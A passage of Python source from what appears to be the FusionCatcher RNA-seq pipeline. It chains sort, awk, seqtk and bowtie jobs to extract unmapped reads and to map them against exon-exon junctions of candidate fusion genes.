job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) job.add('--fast',kind='program') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('unmapped-reads.fq.gz'),kind='output') job.run() # job.add('phred.py',kind='program') # job.add('--link','hard',kind='parameter') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('unmapped-reads.fq'),kind='output') # job.add('--input_type','illumina',kind='parameter') # job.add('--output_type','sanger',kind='parameter') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.run() # # if pigz: # job.add('pigz',kind='program') # job.add('-p',options.processes,kind='parameter',checksum='no') # else: # job.add('gzip',kind='program') # job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('unmapped-reads.fq.gz'),kind='output') # job.run() if double_bowtie and (not candidates): job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('original_important.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('originala.fq.gz'),kind='input') job.add('--list',outdir('original_important.txt'),kind='input') job.add('--output',outdir('original_important.fq.gz'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run() elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_transcriptome_sorted-read_end.map')),id="###reads_filtered_transcriptome_sorted-read_end.map###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() job.clean(outdir('reads_filtered_transcriptome_sorted-read_end.map'),temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('original_important.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() if candidates: # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-2); print r}'""",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_ids_unmapped.txt'),kind='output') job.run() # add also the mates to the unmapped reads (the mates may be mapping just fine) job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"1"; print r"2"}'""",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input',temp_path=temp_flag if not options.keep_unmapped_reads else 'no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('original_important.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('originala.fq.gz'),kind='input') job.add('--list',outdir('original_important.txt'),kind='input') job.add('--output',outdir('original_important.fq.gz'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run() elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) # extract the line with reads which are important further from the transcriptome mapping # job.add('reads_from_map.py',kind='program') # job.add('--input_reads',outdir('original_important.txt'),kind='input',temp_path=temp_flag) # job.add('--input_map',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) # job.add('--output_map',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') # job.add('--operation','extract',kind='parameter') # job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('original_important.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() if options.keep_unmapped_reads: # # job.add('extract_reads_ids.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='output') # job.run() # extract the short reads which mapped on the transcriptome and do not map on genome # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('original.fq.gz'),kind='input') # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) # job.add('phred.py',kind='program') # job.add('--link','hard',kind='parameter') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('unmapped-reads.fq'),kind='output') # job.add('--input_type','illumina',kind='parameter') # job.add('--output_type','sanger',kind='parameter') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('--output','-',kind='parameter',checksum='no') elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('-',kind='parameter') #job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='output') #job.run() # convert FASTQ illumina to sanger #job.add('seqtk',kind='program') # job.add('|',kind='parameter') # job.add('seqtk',kind='parameter') # job.add('seq',kind='parameter') # job.add('-Q64',kind='parameter') # job.add('-V',kind='parameter') # job.add('-',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('unmapped-reads.fq'),kind='output') #job.run() job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('unmapped-reads.fq.gz'),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),temp_path=temp_flag) if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_fastq.py',kind='program') job.add('--input_fastq',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) job.add('--input_fusions',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind = 'input') job.add('--output_fastq',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='output') job.add('--log',info_file,kind='output',checksum='no') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'), temp_path=temp_flag) # generate the exon-exon junctions job.add(_FC_+'generate_exon-exon_junctions.py',kind='program') job.add('--input_fusion_genes',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_fasta_transcripts',datadir('transcripts.fa'),kind='input') job.add('--input_database_transcripts',datadir('transcripts.txt'),kind='input') job.add('--overlap_read',length_anchor_bowtie,kind='parameter') # :-) job.add('--unique_cut_sequences_same_pair',kind='parameter') #added job.add('--length_reads_filename',outdir('log_lengths_reads.txt'),kind='input') job.add('--output_cut_junction',outdir('exon-exon_junction_cut.fa'),kind='output') job.add('--output_count_seq',outdir('exon-exon_junction_cut__seq.txt'),kind='output') job.add('--output_count_nuc',outdir('exon-exon_junction_cut__nuc.txt'),kind='output') job.run() nucleotides_ee = int(float(file(outdir('exon-exon_junction_cut__nuc.txt'),"r").readline().strip())) # double_bowtie = False # if max_len_reads > min_len_reads: # double_bowtie = True parts = [] if nucleotides_ee > options.limit_bowtie: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('exon-exon_junction_cut__nuc.txt'),kind='input') job.add('--seqs',outdir('exon-exon_junction_cut__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') job.add('-i',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('-o',outdir('exon-exon_junction_cut_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('exon-exon_junction_cut_split.fa'),'r').readlines()] for i,part in enumerate(parts): # map the reads which do not align anywhere on the exon-exon junctions from fusion-genes # build index job.add(_BE_+'bowtie-build',kind='program') # if bowtie121: # job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') if bowtie121: job.add('--threads',options.processes,kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input') job.add('',part+'_dir/',kind='output') job.run() # map using the exon-exon fusion genes index (all possible mappings) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i)),kind='output',dest_list='exonexon_un') # here is the result job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path='no' if double_bowtie else temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='input') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='output') # <== mappings on exon-exon junctions for fusion genes ####### # XXX job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt.'+str(i)),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') # sort the reads' mappings on exon-exon by reference sequence, i.e. # gene-gene,transcript-transcript,exon-exon job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map.'+str(i)),kind='output',dest_list='exonexon') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt.'+str(i)),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i))),id="###reads_fnmgnmteef.fq."+str(i)+"###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i)),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),temp_path=temp_flag) job.sink(job.exonexon, outdir('exonexon.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='output') job.run() job.clean(job.exonexon,temp_path=temp_flag) job.sink(job.exonexon_un, outdir('exonexon_un.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon_un.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') job.run() job.clean(job.exonexon_un,temp_path=temp_flag) else: # map the reads which do not align anywhere on the exon-exon junctions from fusion-genes # build index job.add(_BE_+'bowtie-build',kind='program') # if bowtie121: # job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') if bowtie121: job.add('--threads',options.processes,kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('',outdir('exon-exon_fusion-genes/'),kind='output') job.run() # map using the exon-exon fusion genes index (all possible mappings) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(outdir('exon-exon_fusion-genes','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') # here is the result job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') job.add('',outdir('exon-exon_fusion-genes/'),kind='input',temp_path='no' if double_bowtie else temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='output') # <== mappings on exon-exon junctions for fusion genes ####### # XXX job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') # sort the reads' mappings on exon-exon by reference sequence, i.e. # gene-gene,transcript-transcript,exon-exon job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='output') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq')),id="###reads_fnmgnmteef.fq###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') job.run() if candidates and (not double_bowtie): job.link(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'), outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'), temp_path=temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), temp_path=temp_flag) if double_bowtie: ######## # do again bowtie aligning if the reads are longer than my trimming ########## if job.iff(not(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'))),id="###reads-filtered-ng-nt-ex-ex-final###"): # here the un-mapped reads # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_transcriptome22.txt'),kind='output') job.run() else: job.add('touch',kind='program') job.add('',outdir('reads_transcriptome22.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_transcriptome22.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('>',outdir('reads_transcriptome22_more.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) if not candidates: # generate the exon-exon junctions job.add(_FC_+'generate_exon-exon_junctions.py',kind='program') job.add('--input_fusion_genes',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_fasta_transcripts',datadir('transcripts.fa'),kind='input') job.add('--input_database_transcripts',datadir('transcripts.txt'),kind='input') job.add('--overlap_read',length_anchor_bowtie,kind='parameter') # :-) job.add('--unique_cut_sequences_same_pair',kind='parameter') #added job.add('--length_reads_filename',outdir('log_lengths_reads.txt'),kind='input') job.add('--output_cut_junction',outdir('exon-exon_junction_cut.fa'),kind='output') job.add('--output_count_seq',outdir('exon-exon_junction_cut__seq.txt'),kind='output') job.add('--output_count_nuc',outdir('exon-exon_junction_cut__nuc.txt'),kind='output') job.run() nucleotides_ee = int(float(file(outdir('exon-exon_junction_cut__nuc.txt'),"r").readline().strip())) job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-E',options.trim_3end_keep,kind='parameter') job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='input') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('seq',kind='parameter') job.add('-L',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_psl_0.fq'),kind='output') job.run() step = options.trim_3end_keep - 2 * length_anchor_bowtie cuts = [c for c in range(0,max_len_reads,step) if c!=0 and c+options.trim_3end_keep<max_len_reads] if not cuts: job.link(outdir('reads_filtered_psl_0.fq'), outdir('reads_filtered_psl.fq'),temp_path=temp_flag) else: for i,c in enumerate(cuts): job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-B',c+options.trim_3end_keep,kind='parameter') job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='input') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-E',options.trim_3end_keep,kind='parameter') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') 